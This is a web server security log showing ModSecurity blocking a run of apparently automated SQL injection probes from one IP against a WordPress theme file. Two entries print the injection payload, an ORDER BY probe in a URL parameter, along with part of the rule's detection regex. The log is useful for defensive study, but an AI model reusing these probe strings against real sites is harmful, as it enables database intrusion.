[Fri Jul 12 08:36:35.636941 2024] [:error] [pid 29517:tid 139783711966976] [client 141.98.81.44:38114] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExY_UCh5vf5PuAcijj_gAAABI"] [Fri Jul 12 08:36:35.952927 2024] [:error] [pid 29517:tid 139783703574272] [client 141.98.81.44:38116] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExY_UCh5vf5PuAcijj_wAAABM"] [Fri Jul 12 08:36:36.350314 2024] [:error] [pid 29517:tid 139783924430592] [client 141.98.81.44:38118] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExZPUCh5vf5PuAcijkAAAAAAE"] [Fri Jul 12 08:36:36.687513 2024] [:error] [pid 29519:tid 139783899252480] [client 141.98.81.44:38120] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExZDEhNOprNgeRyDcP9gAAAIQ"] [Fri Jul 12 08:36:37.118393 2024] [:error] [pid 30143:tid 139783770715904] [client 141.98.81.44:38122] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExZRoAeojmxWlFps7wtAAAAMs"] [Fri Jul 12 08:36:38.957940 2024] [:error] [pid 30143:tid 139783728752384] [client 141.98.81.44:38124] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExZhoAeojmxWlFps7wtQAAANA"] [Fri Jul 12 08:36:39.210512 2024] [:error] [pid 29519:tid 139783932823296] [client 141.98.81.44:38126] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExZzEhNOprNgeRyDcP9wAAAIA"] [Fri Jul 12 08:36:39.467666 2024] [:error] [pid 29519:tid 139783661610752] [client 141.98.81.44:38128] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExZzEhNOprNgeRyDcP-AAAAJg"] [Fri Jul 12 08:36:39.726118 2024] [:error] [pid 30143:tid 139783779108608] [client 141.98.81.44:38130] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExZxoAeojmxWlFps7wtgAAAMo"] [Fri Jul 12 08:36:39.972076 2024] [:error] [pid 29519:tid 139783703574272] [client 141.98.81.44:38132] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExZzEhNOprNgeRyDcP-QAAAJM"] [Fri Jul 12 08:36:40.212093 2024] [:error] [pid 29517:tid 139783890859776] [client 141.98.81.44:38134] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47' ORDER BY 1-- bTUM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExaPUCh5vf5PuAcijkAQAAAAU"] [Fri Jul 12 08:36:40.695733 2024] [:error] [pid 30143:tid 139783745537792] [client 141.98.81.44:38136] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExaBoAeojmxWlFps7wtwAAAM4"] [Fri Jul 12 08:36:41.082198 2024] [:error] [pid 29518:tid 139783804286720] [client 141.98.81.44:38138] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExaag1rY6w-xq1eShSWgAAAEc"] [Fri Jul 12 08:36:41.437801 2024] [:error] [pid 30143:tid 139783703574272] [client 141.98.81.44:38140] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExaRoAeojmxWlFps7wuAAAANM"] [Fri Jul 12 08:36:41.851225 2024] [:error] [pid 30143:tid 139783720359680] [client 141.98.81.44:38142] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExaRoAeojmxWlFps7wuQAAANE"] [Fri Jul 12 08:36:42.109401 2024] [:error] [pid 30143:tid 139783737145088] [client 141.98.81.44:38144] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExahoAeojmxWlFps7wugAAAM8"] [Fri Jul 12 08:36:42.469013 2024] [:error] [pid 30143:tid 139783924430592] [client 141.98.81.44:38146] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExahoAeojmxWlFps7wuwAAAME"] [Fri Jul 12 08:36:42.851905 2024] [:error] [pid 30143:tid 139783711966976] [client 141.98.81.44:38148] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExahoAeojmxWlFps7wvAAAANI"] [Fri Jul 12 08:36:43.753605 2024] [:error] [pid 30143:tid 139783661610752] [client 141.98.81.44:38150] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExaxoAeojmxWlFps7wvQAAANg"] [Fri Jul 12 08:36:43.998082 2024] [:error] [pid 30143:tid 139783932823296] [client 141.98.81.44:38152] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExaxoAeojmxWlFps7wvgAAAMA"] [Fri Jul 12 08:36:44.249438 2024] [:error] [pid 30143:tid 139783907645184] [client 141.98.81.44:38154] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExbBoAeojmxWlFps7wvwAAAMM"] [Fri Jul 12 08:36:44.500832 2024] [:error] [pid 30143:tid 139783678396160] [client 141.98.81.44:38156] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47%' ORDER BY 1-- YyJn"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExbBoAeojmxWlFps7wwAAAANY"] [Fri Jul 12 08:36:44.825895 2024] [:error] [pid 30143:tid 139783890859776] [client 141.98.81.44:38158] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExbBoAeojmxWlFps7wwQAAAMU"] [Fri Jul 12 08:36:45.283414 2024] [:error] [pid 30143:tid 139783899252480] [client 141.98.81.44:38160] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExbRoAeojmxWlFps7wwgAAAMQ"] [Fri Jul 12 08:36:45.621106 2024] [:error] [pid 30143:tid 139783770715904] [client 141.98.81.44:38162] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExbRoAeojmxWlFps7wwwAAAMs"] [Fri Jul 12 08:36:45.992933 2024] [:error] [pid 30143:tid 139783728752384] [client 141.98.81.44:38164] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExbRoAeojmxWlFps7wxAAAANA"] [Fri Jul 12 08:36:46.420775 2024] [:error] [pid 30143:tid 139783779108608] [client 141.98.81.44:38166] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExbhoAeojmxWlFps7wxQAAAMo"] [Fri Jul 12 08:36:46.692217 2024] [:error] [pid 29518:tid 139783770715904] [client 141.98.81.44:38168] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExbqg1rY6w-xq1eShSWwAAAEs"] [Fri Jul 12 08:36:47.136118 2024] [:error] [pid 30143:tid 139783745537792] [client 141.98.81.44:38170] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExbxoAeojmxWlFps7wxgAAAM4"] [Fri Jul 12 08:36:47.592122 2024] [:error] [pid 29518:tid 139783762323200] [client 141.98.81.44:38172] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExb6g1rY6w-xq1eShSXAAAAEw"] [Fri Jul 12 08:36:47.894039 2024] [:error] [pid 29518:tid 139783720359680] [client 141.98.81.44:38174] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag 